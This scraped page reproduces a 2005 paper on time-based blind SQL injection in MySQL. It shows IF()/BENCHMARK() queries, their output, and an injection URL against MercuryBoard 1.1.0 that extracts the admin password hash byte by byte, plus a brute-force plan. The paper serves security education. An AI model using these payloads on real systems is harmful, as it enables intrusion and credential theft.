virus
virus

Blind Injection in MySQL Databases

{====================================================================}

{                            [   Zeelock-2005   ]                       }

{================================================================}

{                                                                      
       }

{                 A D V A N C E D  S Q L - I N J E C T I O N           
       }

{                                                                      
       }

{                  [   Blind Injection in MySQL Databases   ]          
       }

{                                                                      
       }

{                                                                      
       }

{=======================================================================
=======}

"Validate anything can be passed. Security lays in the inputs. " - zk

Date: 15th February 2005

Keywords: Benchmark(), IF(), "Blind Injection", "Time Delay", waitfor

Abstract

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MySQL is not an easy database for Blind SQL Injection: it displays no er
rors

when an UNION occours between two columns of different type and there is
n't a

way to make a query displaying errors from parameters passed inside the
query

itself. Many times happens that auditing the code of a php/MySQL applica
tion, we

find an injection vulnerability that is not exploitable, because we cann
ot see

the output or we see always an error cause the value retrieved is passed
to

multiple queries with a different numbers of columns before the script e
nds.

In this cases the SELECT...UNION statement isn't enough. Or not?

Injection toolbox

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A common trick is always to UNION SELECT [null,null,.. up to the right n
umber of

columns in the previous SELECT]/* to see when we get no errors, so we ca
n

procede further. Even if we know exactly the name of each COLUMN in each
TABLE,

is nearly impossible to retrieve the content if no output is displayed.

In the following examples I'll show you step by step how to retrieve the


password hash from a vulnerability discovered in MercuryBoard by codebug
.org

that seemed not to be  exploitable because you cannot see any good outpu
t.

I assume that the name of the tables is already known. (This is a common
issue,

during the auditing of Opensource scripts, or when debugging options are
active

by default).

The Vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MercuryBoard v. 1.1.0 Alberto Trivero discovered an SQL-Injection when t
he

post.php include was switched to 'reply' and the parameter 't' was passe
d.

The issue generated an error when an user is logged in an tries to perfo
rm the

following operation:

[url]http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1[/url]

The issue seemed not to be exploitable. In reality it was.

Being Ready for Blindness

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

First of all I have fully installed a vulnerable version of Mercuryboard
with

a low privileges user for the DB.

|---| DATABASE name is 'mercuryboard'|---| (let's show the tables)

mysql> SHOW TABLES;

+-------------------+

| Tables_in_mercury |

+-------------------+

| mb_active         |

| mb_attach         |

| mb_forums         |

| mb_groups         |

| mb_help           |

| mb_logs           |

| mb_membertitles   |

| mb_pmsystem       |

| mb_posts          |

| mb_replacements   |

| mb_settings       |

| mb_skins          |

| mb_subscriptions  |

| mb_templates      |

| mb_topics         |

| mb_users          |

| mb_votes          |

+-------------------+

17 rows in set (0.00 sec)

|---| As you can see Current User is a common User |---| (Never run as r
oot!)

mysql> SELECT USER();

+---------------+

| USER()        |

+---------------+

| 123@localhost |

+---------------+

1 row in set (0.00 sec)

mysql> SELECT password,USER() FROM mysql.user;

ERROR 1142: select command denied to user: '123@localhost' for table 'us
er'

mysql>

|---| The following query shows the first byte of Admin's Hash |---|

mysql> SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_grou
p = 1;

+------------------------------+

| SUBSTRING(user_password,1,1) |

+------------------------------+

| 5                            |

+------------------------------+

1 row in set (0.00 sec)

|---| The following is the first byte of Admin's Hash as ASCII number |-
--|

mysql> SELECT ASCII('5');

+------------+

| ASCII('5') |

+------------+

|         53 |

+------------+

1 row in set (0.00 sec)

Feeling the difference

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The goal is to find a way to be advised in someway that the contant we a
re

looking for is the right one. How is it possible to know if the first by
te of

Admin Hash is or not equal to '5'?

Well, in NGSS whitepaper the author simply made the query to be delayed
if the

content matched the one injected. In msSQL this was pursued with a condi
tional

IF [QUERY] waitfor [TIME]. MySQL doesn't support 'waitfor'.

In the following query I succeded in creating a delayed of 5 seconds by
using an

IF() function followed by a BENCHMARK() function. Current User can execu
te it

with low privileges (Usually you can execute the BENCHMARK() function if
you can

SELECT). That's why is so powerful.

|---| Passing a wrong number |---| (CHAR(52) is equal to '4')

mysql> Select active_id FROM mb_active UNION SELECT IF(SUBSTRING(user_pa
ssword,1

,1) = CHAR(52),BENCHMARK(5000000,ENCODE('Slow Down','by 5 seconds')),nul
l) FROM

mb_users WHERE user_group = 1;

+-----------+

| active_id |

+-----------+

|         3 |

|         0 |

+-----------+

2 rows in set (0.00 sec)

In the previous example the BENCHMARK() function is not executed (Elapse
d Time

0.00 sec).

|---| Passing the matching content |---| (BENCHMARK() is executed)

mysql> Select active_id FROM mb_active UNION SELECT IF(SUBSTRING(user_pa
ssword,1

,1) = CHAR(53),BENCHMARK(5000000,ENCODE('Slow Down','by 5 seconds')),nul
l) FROM

mb_users WHERE user_group = 1;

+-----------+

| active_id |

+-----------+

|         3 |

|         0 |

+-----------+

2 rows in set (5.36 sec)

In the previous example the BENCHMARK() function delayed the query by 5.
36 sec.

Prepairing for GET req

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To inject sql commands succesfully we have to clean the request from any
single

quote.

|---| Cleaning from quotes |---|

mysql> Select active_id FROM mb_active UNION SELECT IF(SUBSTRING(user_pa
ssword,1

,1) = CHAR(53),BENCHMARK(1000000,MD5(CHAR(1))),null) FROM mb_users WHERE
user_gr

oup = 1;

+-----------+

| active_id |

+-----------+

|         3 |

|         0 |

+-----------+

2 rows in set (4.65 sec)

mysql>

Exploiting the vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

First we have to log in a Registered User with the rights to reply in th
e

current thread.

[url]http://127.0.0.1/mercuryboard/index.php?a=post&s=reply&t=1%20UNION%20SEL[/url]
ECT%20IF

(SUBSTRING(user_password,1,1)%20=%20CHAR(53),BENCHMARK(1000000,MD5(CHAR(
1))),

null),null,null,null,null%20FROM%20mb_users%20WHERE%20user_group%20=%201
/*

And we'll see a slow down of a couple of seconds cause the first byte is


CHAR(53), 5.

Bruteforcing

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For rebuilding content letter by letter is needed only a simple perl scr
ipt that

performs GET requests and wait for the answer byte after byte {..SUBSTRI
NG(strn,

[1,2,3..n],1)..} and if the response is delayed by 7 to 10 seconds, we h
ave the

right stuff. Bruteforcing could take a while with MD5 hashes, because th
ey are

alfanumeric, 32 bytes long. Fortunately not CASE SENSITIVE.

0 to 9 --> ASCII 48 to 57

a to z --> ASCII 97 to 122

In the worst case it takes about 36 requests of about 3 sec per request
plus the

delay for the right byte. A full hash in the worst case could be retrie
ved in

((3*35)+10)*32= 3622 seconds (1 hour).

Conclusion

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Even MySQL is subjected to Blind Sql Injection.

Thanks to +mala (PowerBrowsing and GA are awesome), NGSS security (for s
uch

'avanced' papers), BlueberryPie friends
--

你可能感兴趣的:(sql,mysql,数据库,database,休闲)

  • MVC 架构学习笔记 disgare 架构mvc架构学习
    MVC架构学习笔记Service与DAO层方法命名规约业务错误是用返回值来处理还是抛异常来处理Service与DAO层方法命名规约CRUD是指在做计算处理时的增加(Create)、读取查询(Retrieve)、更新(Update)和删除(Delete)几个单词的首字母简写。主要被用在描述软件系统中DataBase或者持久层的基本操作功能。对应这里的crud方法的命名,每个人有不同的实践。以下是阿里
  • azkaban的概况 北京小峻 大数据azkabanmysql数据库
    Azkaban的性质azkaban是一个任务调度,管理系统,可以帮用户管理,调度各种运算任务的一个web服务器可以调度任何任务,只要你的任务能用脚本启动azkaban的类似的产品还有很多,例如hadoop生态中原生的:oozie,areflow局限性目前azkaban只支持mysql作为元数据管理系统,必须安装mysql服务器角色executorserver有好几个是真正执行的程序,调度用户的任务
  • Mybatis总结(一)(简单介绍) weixin_34326429 java数据库
    1.1MyBatis介绍MyBatis本是apache的一个开源项目iBatis,2010年这个项目由apachesoftwarefoundation迁移到了googlecode,并且改名为MyBatis,实质上Mybatis对ibatis进行一些改进。MyBatis是一个优秀的持久层框架,它对jdbc的操作数据库的过程进行封装,使开发者只需要关注SQL本身,而不需要花费精力去处理例如注册驱动、创
  • mybatis架构原理 章绍龙 java基础
    1、mybatis配置SqlMapConfig.xml,此文件作为mybatis的全局配置文件,配置了mybatis的运行环境等信息。mapper.xml文件即sql映射文件,文件中配置了操作数据库的sql语句。此文件需要在SqlMapConfig.xml中加载。SqlMapConfig.xml是mybatis的核心文件。mybatis将dao层与sql语句分离开来,虽然写的时候分离开来了,但是执
  • 动手写分布式缓存 11 qq_50996930 Go语言学习专栏分布式缓存
    main函数实现定义一个map模拟数据库。varmysql=map[string]string{"Tom":"630","Jack":"589","Sam":"567",}为多个端口处创建rpc服务服务名就是ip+端口。将各个服务器的ip+端口加到每个服务器的哈希环里。为每个服务器创建缓存池组。缓存池组和rpc服务绑定。持续监听端口addrs:=[]string{"localhost:9999",
  • 青少年编程与数学 02-007 PostgreSQL数据库应用 12课题、存储过程编写 明月看潮生 编程与数学第02阶段数据库青少年编程postgresql编程与数学
    青少年编程与数学02-007PostgreSQL数据库应用12课题、存储过程编写一、存储过程二、分类三、创建四、调用五、修改六、删除七、应用示例八、内置存储过程课题摘要:本课题详细介绍了PostgreSQL中存储过程的编写和操作。存储过程是一系列SQL语句的集合,可作为单元保存在数据库中,用于执行数据查询、更新、插入和删除等操作。它们具有封装性、提高性能、增强安全性、事务管理、参数化和返回结果等特
  • hive电影数据分析系统 Springboot协同过滤-余弦函数推荐系统 爬虫2万+数据 大屏数据展示 + [手把手视频教程 和 开发文档] QQ-1305637939 毕业设计大数据毕设计算机毕业设计hivespringboot爬虫
    hive电影数据分析Springboot协同过滤-余弦函数推荐系统爬虫2万+数据大屏数据展示+[手把手视频教程和开发文档]【功能介绍】1.java爬取【豆瓣电影】网站中电影数据,保存为data.csv文件,数据量2万+2.data.csv上传到hadoop集群环境3.MR数据清洗data.csv4.Hive汇总处理,将Hive处理的结果数据保存到本地Mysql数据库中5.Springboot+Vu
  • hadoop电影数据分析系统 Springboot协同过滤-余弦函数推荐系统 爬虫2万+数据 大屏数据展示 + [手把手视频教程 和 开发文档] QQ-1305637939 计算机毕业设计毕业设计大数据毕设hadoopspringboot爬虫
    全套视频教程全套开发文档hadoop电影数据分析系统Springboot协同过滤-余弦函数推荐系统爬虫2万+数据大屏数据展示【Hadoop项目】1.java爬取【豆瓣电影】网站中电影数据,保存为data.csv文件,数据量2万+2.data.csv上传到hadoop集群环境3.data.csv数据清洗4.MR数据汇总处理,将Reduce的结果数据保存到本地Mysql数据库中5.Springboot
  • spark电影数据分析系统 Springboot协同过滤-余弦函数推荐系统 爬虫2万+数据 大屏数据展示 + [手把手视频教程 和 开发文档] QQ-1305637939 毕业设计大数据毕设计算机毕业设计sparkspringboot爬虫大数据电影推荐电影分析
    spark电影数据分析系统Springboot协同过滤-余弦函数推荐系统爬虫2万+数据大屏数据展示+[手把手视频教程和开发文档【功能介绍】1.java爬取【豆瓣电影】网站中电影数据,保存为data.csv文件,数据量2万+2.data.csv上传到hadoop集群环境3.MR数据清洗data.csv4.Spark汇总处理,将Spark处理的结果数据保存到本地Mysql数据库中5.Springboo
  • hadoop图书数据分析系统 Springboot协同过滤-余弦函数推荐系统 爬虫1万+数据 大屏数据展示 + [手把手视频教程 和 开发文档] QQ-1305637939 毕业设计大数据毕设图书数据分析hadoopspringboot爬虫
    hadoop图书数据分析系统Springboot协同过滤-余弦函数推荐系统爬虫1万+数据大屏数据展示+[手把手视频教程和开发文档]【亮点功能】1.Springboot+Vue+Element-UI+Mysql前后端分离2.Echarts图表统计数据,直观展示数据情况3.发表评论后,用户可以回复评论,回复的评论可以被再次回复,一级评论可以添加图片附件4.爬虫图书数据1万+5.推荐图书列表展示,推荐图
  • 海尔 F231ZC 随身 WiFi 刷机升级全攻略 虎王科技 golang后端
    随身WiFi相关(程序+源码+工具+调试部署+开发环境)总共500多GB以上,文章末尾可获取,在最后面了。技术来自酷安论坛本文进攻学习研究自娱自乐在快节奏的现代生活中,网络连接已成为我们不可或缺的一部分。无论是商务出行还是日常休闲,随身WiFi设备都能为我们提供随时随地的上网服务。而海尔F231ZC作为一款备受关注的随身WiFi产品,其性能与功能也在不断更新和优化。本文将为您详细介绍海尔F231Z
  • SeaTunnel 与 DataX 、Sqoop、Flume、Flink CDC 对比 不二人生 #数据集成工具SeaTunnel
    文章目录SeaTunnel与DataX、Sqoop、Flume、FlinkCDC对比同类产品横向对比2.1、高可用、健壮的容错机制2.2、部署难度和运行模式2.3、支持的数据源丰富度2.4、内存资源占用2.5、数据库连接占用2.6、自动建表2.7、整库同步2.8、断点续传2.9、多引擎支持2.10、数据转换算子2.11、性能2.12、离线同步2.13、增量同步&实时同步2.14、CDC同步2.15
  • 使用宝塔面板以jar包方式部署SpringBoot个人博客(以IP+端口号访问) emmastone 部署springbootsshcentos服务器
    使用宝塔面板以jar包方式部署SpringBoot个人博客购买阿里云服务器ECS在服务器端创建数据库修改SpringBoot项目的配置文件上传jar包和配置文件到服务器同一个目录下放行相关端口号首先需要在阿里云的控制台放行相关端口号然后在宝塔面板的安全放行相关端口号购买阿里云服务器ECS购买ECS服务器时,选择附带宝塔面板的,会默认安装好LAMP(Apache+Mysql+php),只需在安装to
  • 什么是ShardingSphere的关联表? java1234_小锋 javaShardingSphere
    大家好,我是锋哥。今天分享关于【什么是ShardingSphere的关联表?】面试题。希望对大家有帮助;什么是ShardingSphere的关联表?1000道互联网大厂Java工程师精选面试题-Java资源分享网在ShardingSphere中,关联表(也叫做跨库跨表查询)是指多个表之间通过关联查询而涉及到的表。当你在进行数据库分片时,可能会遇到多个表需要通过外键、联合查询等方式进行连接的情况。S
  • MySQL有哪些高可用方案? java1234_小锋 mysqlmysql数据库
    大家好,我是锋哥。今天分享关于【RMySQL有哪些高可用方案?】面试题。希望对大家有帮助;MySQL有哪些高可用方案?1000道互联网大厂Java工程师精选面试题-Java资源分享网MySQL的高可用方案可以帮助确保数据库在发生故障时仍能持续提供服务,避免单点故障带来的影响。以下是一些常见的MySQL高可用方案:1.主从复制(Master-SlaveReplication)概述:主从复制是最常见的
  • MyBatis框架 TuSi_Cat 框架mybatis开发语言javaspringmaventomcat
    目录框架技术持久化与ORMMyBatis简介搭建MyBatis开发环境MyBatis框架优缺点MyBatis基本要素核心接口和类的结构核心对象SqlSessionFactoryBuilderSqlSessionFactorySqlSession系统核心配置文件配置properties元素配置properties元素的两种方式settings元素typeAliases元素environments元素
  • Leetcode高频 SQL 50 题(基础版)(二) LiquoriceG leetcodesql
    一、员工奖金表:Employee+-------------+---------+|ColumnName|Type|+-------------+---------+|empId|int||name|varchar||supervisor|int||salary|int|+-------------+---------+empId是该表中具有唯一值的列。该表的每一行都表示员工的姓名和id,以及他们
  • 如何实现亿级用户在线状态统计? 繁川 Java面试精选数据库android
    亿级用户在线场景分析与解决方案目录亿级用户在线场景分析解决方案2.1基于总数的统计方案2.2基于具体用户详情的统计方案具体实现3.1基于总数的统计方案3.2基于用户标识的统计实现3.3SpringBoot中的实现总结1.亿级用户在线场景分析以QQ在线状态统计为例,其典型特征包括:数据量大、内存占用高、实时性要求高。传统的解决方案(如在数据库中为每个用户添加一个在线状态字段,上线设为1,下线设为0)
  • 改善python程序的91建议记录(学习记录) 后端
    使用else子句简化循环(异常处理)案例1执行sql异常时处理defsave(db,obj):try:#saveattr1db.execute('asqlstmt',obj.attr1)#saveattr2db.execute('anothersqlstmt',obj.attr2)exceptDBError:db.rollback()else:db.commit()案例2defprint_prim
  • 2025毕设springboot MVC框架下的精品课程管理平台论文+源码 zhihao501 课程设计springbootmvc
    本系统(程序+源码)带文档lw万字以上文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景在教育信息化的大背景下,精品课程管理平台的构建成为提升教学质量和效率的重要手段。当前,许多高校和教育机构仍然采用传统的课程管理方式,不仅效率低下,还难以满足学生日益增长的个性化学习需求。SpringBootMVC框架作为一种轻量级、高效的JavaWeb开发框架,以其简洁的设计理
  • 【大模型】Spring AI对接ChatGpt使用详解 小码农叔叔 微服务治理与实战springboot入门到精通springspringaiAspringAispringai对接gptspringai整合gptspringai使用详解springai使用
    目录一、前言二、springai介绍2.1什么是SpringAI2.2SpringAI特点2.3SpringAI为开发带来的便利2.4SpringAI应用领域2.4.1聊天模型2.4.2文本到图像模型2.4.3音频转文本2.4.4嵌入大模型使用2.4.5矢量数据库支持2.4.6用于数据工程ETL框架三、SpringAI对接ChatGPT3.1前置准备3.2添加依赖3.3接入流程3.3.1配置文件3
  • ent.SetDatabaseDefaults() yngsqq CADC#二次开发数据库
    在AutoCAD的.NETAPI中,ent.SetDatabaseDefaults()这句代码通常用于将一个实体(Entity)对象的属性设置为与其所在的数据库(Database)的默认设置相匹配。这意味着,该实体将采用数据库级别的默认颜色、图层、线型等属性,除非这些属性已经被显式地设置为了其他值。这里的ent是一个代表AutoCAD中实体的变量,它可能是Entity类或其任何子类的实例,如Lin
  • 【YashanDB知识库】YashanDB与Oracle数据类型对齐 数据库
    本文内容来自YashanDB官网,原文内容请见https://www.yashandb.com/newsinfo/7253737.html?templateId=171...关于参数USE\_NATIVE\_TYPE在迁移基于Oracle数据库的应用时,有时会遇到应用代码中定义的数据类型与YashanDB返回数据类型不匹配的问题,可以尝试在创建数据库的时候指定参数USE\_NATIVE\_TYPE
  • 【YashanDB知识库】手工迁移Doris数据到崖山分布式 数据库
    本文内容来自YashanDB官网,原文内容请见https://www.yashandb.com/newsinfo/7253739.html?templateId=171...本方案采用csv文件格式进行数据的导出和导入。具体步骤如下:通过sql语句将Doris表导出成csv文件注:导出到本地文件时需要先在fe.conf中配置enable_outfile_to_local=true并重启fe节点--
  • 【YashanDB知识库】锁冲突检查 数据库
    本文内容来自YashanDB官网,原文内容请见https://www.yashandb.com/newsinfo/7253740.html?templateId=171...应用并发操作时,可能发生锁冲突。常见的有行锁冲突、表锁冲突,比如更新同一条记录会出现行锁等待。可以使用下面语句检查当前数据库是否正在发生锁冲突,如果有的话,可以列出哪些应用在申请锁、申请什么样的锁,以及申请的锁被哪些应用持有。
  • 大数据学习(36)- Hive和YARN viperrrrrrr 大数据学习hive
    &&大数据学习&&系列专栏:哲学语录:承认自己的无知,乃是开启智慧的大门如果觉得博主的文章还不错的话,请点赞+收藏⭐️+留言支持一下博主哦当客户端提交SQL作业到HiveServer2时,HiveServer2会根据用户提交的SQL作业及数据库中现有的元数据信息生成一份可供计算引擎执行的计划。每个执行计划对应若干MapReduce作业,Hive会将所有的MapReduce作业都提交到YARN中。Y
  • rac 架构和原理 羽之大公公 oracle数据库开发dbamysql
    单点数据库VSRAC单节点数据库,如果实例宕机了,如果一个业务链接在实例上面,那么这个业务就中断了。这个时候系统就不具有可用性了,那么这个时候单节点的可用性是很差的。对于RAC来说,和单实例一样,还是一份数据文件,都是相同的存储上面放着oracle的文件,但是是由三个实例共用同一份数据文件。这样的好处是在三个实例之间做了冗余,在上面三个实例当中任意两个坏了业务都可以链接到剩下的一个实例,都可以
  • MySQL--mysqld、mysql_safe、mysql.server、mysqladmin几种启动和停止服务使用说明 m0_74823683 面试学习路线阿里巴巴mysqladbandroid
    您好,我是贾斯汀,欢迎进来学习的小伙伴~【学习背景】本文对Linux下启动和停止mysql服务最常用的几种方式进行讲解:(1)mysqld(2)mysqld_safe(3)mysql.server(4)mysqladmin关于这几种文件和命令对mysql服务的启动和停止的使用,本文会分别进行介绍,还有一些关键的事项,比如生产环境对于MySQL服务的启动和停止是非常谨慎的一件事,不是每一种方式都适合
  • Oracle 数据库中的内容加密与解密 dbms_crypto 软猫克鲁 SQL相关SQLOracleoracle解密加密数据库
    Oracle数据库中的内容加密与解密说起来Oracle中有很多涉及加密解密的东西,今天说的这个是dbms_crypto。有没有遇到过这样的应用场景,需要将一些敏感数据字段脱敏之后发送给下游。之后下游处理完其他数据之后会携带这个脱敏字段再发回给你,你再用这些敏感信息还原出原始的值匹配更新原来的数据。最近我就遇到了。找了一下,Oracle还真有类似的包:dbms_crypto,使用这个包需要管理员登录
  • 深度挖掘:Oracle RAC数据库架构分析与实战攻略 拟声的主扬 专题数据库oraclerac性能优化网络备份
    深度挖掘:OracleRAC数据库架构分析与实战攻略本书内容从集群概念入手,深入RAC原理和结构进行分析,结合存储和网络传输知识,全面讲解小机集群数据库RAC的安装示例,探讨RAC的管理和维护,详述备份恢复,并从故障诊断方法展开,细说性能优化的几个方面,再到Oracle最高可用架构的延伸。对其内容详细阅读
  • Spring的注解积累 yijiesuifeng spring注解
    用注解来向Spring容器注册Bean。   需要在applicationContext.xml中注册: <context:component-scan base-package=”pagkage1[,pagkage2,…,pagkageN]”/>。 如:在base-package指明一个包    <context:component-sc
  • 传感器 百合不是茶 android传感器
    android传感器的作用主要就是来获取数据,根据得到的数据来触发某种事件   下面就以重力传感器为例;   1,在onCreate中获得传感器服务   private SensorManager sm;// 获得系统的服务 private Sensor sensor;// 创建传感器实例 @Override protected void
  • [光磁与探测]金吕玉衣的意义 comsci
          这是一个古代人的秘密:现在告诉大家       信不信由你们:       穿上金律玉衣的人,如果处于灵魂出窍的状态,可以飞到宇宙中去看星星       这就是为什么古代
  • 精简的反序打印某个数 沐刃青蛟 打印
    以前看到一些让求反序打印某个数的程序。 比如:输入123,输出321。   记得以前是告诉你是几位数的,当时就抓耳挠腮,完全没有思路。   似乎最后是用到%和/方法解决的。   而今突然想到一个简短的方法,就可以实现任意位数的反序打印(但是如果是首位数或者尾位数为0时就没有打印出来了)   代码如下: long num, num1=0;
  • PHP:6种方法获取文件的扩展名 IT独行者 PHP扩展名
      PHP:6种方法获取文件的扩展名   1、字符串查找和截取的方法   1 $extension = substr ( strrchr ( $file ,  '.' ), 1); 2、字符串查找和截取的方法二   1 $extension = substr
  • 面试111 文强chu 面试
    1事务隔离级别有那些 ,事务特性是什么(问到一次) 2 spring aop 如何管理事务的,如何实现的。动态代理如何实现,jdk怎么实现动态代理的,ioc是怎么实现的,spring是单例还是多例,有那些初始化bean的方式,各有什么区别(经常问) 3 struts默认提供了那些拦截器 (一次) 4 过滤器和拦截器的区别 (频率也挺高) 5 final,finally final
  • XML的四种解析方式 小桔子 domjdomdom4jsax
    在平时工作中,难免会遇到把 XML 作为数据存储格式。面对目前种类繁多的解决方案,哪个最适合我们呢?在这篇文章中,我对这四种主流方案做一个不完全评测,仅仅针对遍历 XML 这块来测试,因为遍历 XML 是工作中使用最多的(至少我认为)。   预 备   测试环境:   AMD 毒龙1.4G OC 1.5G、256M DDR333、Windows2000 Server
  • wordpress中常见的操作 aichenglong 中文注册wordpress移除菜单
    1 wordpress中使用中文名注册解决办法   1)使用插件   2)修改wp源代码      进入到wp-include/formatting.php文件中找到       function sanitize_user( $username, $strict = false
  • 小飞飞学管理-1 alafqq 管理
    项目管理的下午题,其实就在提出问题(挑刺),分析问题,解决问题。 今天我随意看下10年上半年的第一题。主要就是项目经理的提拨和培养。 结合我自己经历写下心得 对于公司选拔和培养项目经理的制度有什么毛病呢? 1,公司考察,选拔项目经理,只关注技术能力,而很少或没有关注管理方面的经验,能力。 2,公司对项目经理缺乏必要的项目管理知识和技能方面的培训。 3,公司对项目经理的工作缺乏进行指
  • IO输入输出部分探讨 百合不是茶 IO
     //文件处理  在处理文件输入输出时要引入java.IO这个包; /* 1,运用File类对文件目录和属性进行操作 2,理解流,理解输入输出流的概念 3,使用字节/符流对文件进行读/写操作 4,了解标准的I/O 5,了解对象序列化 */   //1,运用File类对文件目录和属性进行操作   //在工程中线创建一个text.txt
  • getElementById的用法 bijian1013 element
            getElementById是通过Id来设置/返回HTML标签的属性及调用其事件与方法。用这个方法基本上可以控制页面所有标签,条件很简单,就是给每个标签分配一个ID号。        返回具有指定ID属性值的第一个对象的一个引用。        语法: &n
  • 励志经典语录 bijian1013 励志人生
    经典语录1:   哈佛有一个著名的理论:人的差别在于业余时间,而一个人的命运决定于晚上8点到10点之间。每晚抽出2个小时的时间用来阅读、进修、思考或参加有意的演讲、讨论,你会发现,你的人生正在发生改变,坚持数年之后,成功会向你招手。不要每天抱着QQ/MSN/游戏/电影/肥皂剧……奋斗到12点都舍不得休息,看就看一些励志的影视或者文章,不要当作消遣;学会思考人生,学会感悟人生
  • [MongoDB学习笔记三]MongoDB分片 bit1129 mongodb
    MongoDB的副本集(Replica Set)一方面解决了数据的备份和数据的可靠性问题,另一方面也提升了数据的读写性能。MongoDB分片(Sharding)则解决了数据的扩容问题,MongoDB作为云计算时代的分布式数据库,大容量数据存储,高效并发的数据存取,自动容错等是MongoDB的关键指标。 本篇介绍MongoDB的切片(Sharding)   1.何时需要分片 &nbs
  • 【Spark八十三】BlockManager在Spark中的使用场景 bit1129 manager
    1. Broadcast变量的存储,在HttpBroadcast类中可以知道 2. RDD通过CacheManager存储RDD中的数据,CacheManager也是通过BlockManager进行存储的 3. ShuffleMapTask得到的结果数据,是通过FileShuffleBlockManager进行管理的,而FileShuffleBlockManager最终也是使用BlockMan
  • yum方式部署zabbix ronin47 yum方式部署zabbix
    安装网络yum库#rpm -ivh http://repo.zabbix.com/zabbix/2.4/rhel/6/x86_64/zabbix-release-2.4-1.el6.noarch.rpm 通过yum装mysql和zabbix调用的插件还有agent代理#yum install zabbix-server-mysql zabbix-web-mysql mysql-
  • Hibernate4和MySQL5.5自动创建表失败问题解决方法 byalias J2EEHibernate4
    今天初学Hibernate4,了解了使用Hibernate的过程。大体分为4个步骤: ①创建hibernate.cfg.xml文件 ②创建持久化对象 ③创建*.hbm.xml映射文件 ④编写hibernate相应代码 在第四步中,进行了单元测试,测试预期结果是hibernate自动帮助在数据库中创建数据表,结果JUnit单元测试没有问题,在控制台打印了创建数据表的SQL语句,但在数据库中
  • Netty源码学习-FrameDecoder bylijinnan javanetty
    Netty 3.x的user guide里FrameDecoder的例子,有几个疑问: 1.文档说:FrameDecoder calls decode method with an internally maintained cumulative buffer whenever new data is received. 为什么每次有新数据到达时,都会调用decode方法? 2.Dec
  • SQL行列转换方法 chicony 行列转换
    create table tb(终端名称 varchar(10) , CEI分值 varchar(10) , 终端数量 int) insert into tb values('三星' , '0-5' , 74) insert into tb values('三星' , '10-15' , 83) insert into tb values('苹果' , '0-5' , 93)
  • 中文编码测试 ctrain 编码
    循环打印转换编码 String[] codes = { "iso-8859-1", "utf-8", "gbk", "unicode" }; for (int i = 0; i < codes.length; i++) { for (int j
  • hive 客户端查询报堆内存溢出解决方法 daizj hive堆内存溢出
    hive> select * from t_test where ds=20150323 limit 2; OK Exception in thread "main" java.lang.OutOfMemoryError: Java heap space   问题原因: hive堆内存默认为256M   这个问题的解决方法为: 修改/us
  • 人有多大懒,才有多大闲 (评论『卓有成效的程序员』) dcj3sjt126com 程序员
      卓有成效的程序员给我的震撼很大,程序员作为特殊的群体,有的人可以这么懒,  懒到事情都交给机器去做 ,而有的人又可以那么勤奋,每天都孜孜不倦得做着重复单调的工作。   在看这本书之前,我属于勤奋的人,而看完这本书以后,我要努力变成懒惰的人。 不要在去庞大的开始菜单里面一项一项搜索自己的应用程序,也不要在自己的桌面上放置眼花缭乱的快捷图标
  • Eclipse简单有用的配置 dcj3sjt126com eclipse
    1、显示行号  Window -- Prefences -- General -- Editors -- Text Editors -- show line numbers   2、代码提示字符 Window ->Perferences,并依次展开 Java -> Editor -> Content Assist,最下面一栏 auto-Activation
  • 在tomcat上面安装solr4.8.0全过程 eksliang Solrsolr4.0后的版本安装solr4.8.0安装
    转载请出自出处: http://eksliang.iteye.com/blog/2096478       首先solr是一个基于java的web的应用,所以安装solr之前必须先安装JDK和tomcat,我这里就先省略安装tomcat和jdk了         第一步:当然是下载去官网上下载最新的solr版本,下载地址
  • Android APP通用型拒绝服务、漏洞分析报告 gg163 漏洞androidAPP分析
    点评:记得曾经有段时间很多SRC平台被刷了大量APP本地拒绝服务漏洞,移动安全团队爱内测(ineice.com)发现了一个安卓客户端的通用型拒绝服务漏洞,来看看他们的详细分析吧。  0xr0ot和Xbalien交流所有可能导致应用拒绝服务的异常类型时,发现了一处通用的本地拒绝服务漏洞。该通用型本地拒绝服务可以造成大面积的app拒绝服务。  针对序列化对象而出现的拒绝服务主要
  • HoverTree项目已经实现分层 hvt 编程.netWebC#ASP.ENT
    HoverTree项目已经初步实现分层,源代码已经上传到 http://hovertree.codeplex.com请到SOURCE CODE查看。在本地用SQL Server 2008 数据库测试成功。数据库和表请参考:http://keleyi.com/a/bjae/ue6stb42.htmHoverTree是一个ASP.NET 开源项目,希望对你学习ASP.NET或者C#语言有帮助,如果你对
  • Google Maps API v3: Remove Markers 移除标记 天梯梦 google maps api
    Simply do the following:   I. Declare a global variable: var markersArray = [];   II. Define a function: function clearOverlays() { for (var i = 0; i < markersArray.length; i++ )
  • jQuery选择器总结 lq38366 jquery选择器
      1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
  • 基础数据结构和算法六:Quick sort sunwinner AlgorithmQuicksort
    Quick sort is probably used more widely than any other. It is popular because it is not difficult to implement, works well for a variety of different kinds of input data, and is substantially faster t
  • 如何让Flash不遮挡HTML div元素的技巧_HTML/Xhtml_网页制作 刘星宇 htmlWeb
    今天在写一个flash广告代码的时候,因为flash自带的链接,容易被当成弹出广告,所以做了一个div层放到flash上面,这样链接都是a触发的不会被拦截,但发现flash一直处于div层上面,原来flash需要加个参数才可以。 让flash置于DIV层之下的方法,让flash不挡住飘浮层或下拉菜单,让Flash不档住浮动对象或层的关键参数:wmode=opaque。 方法如下:
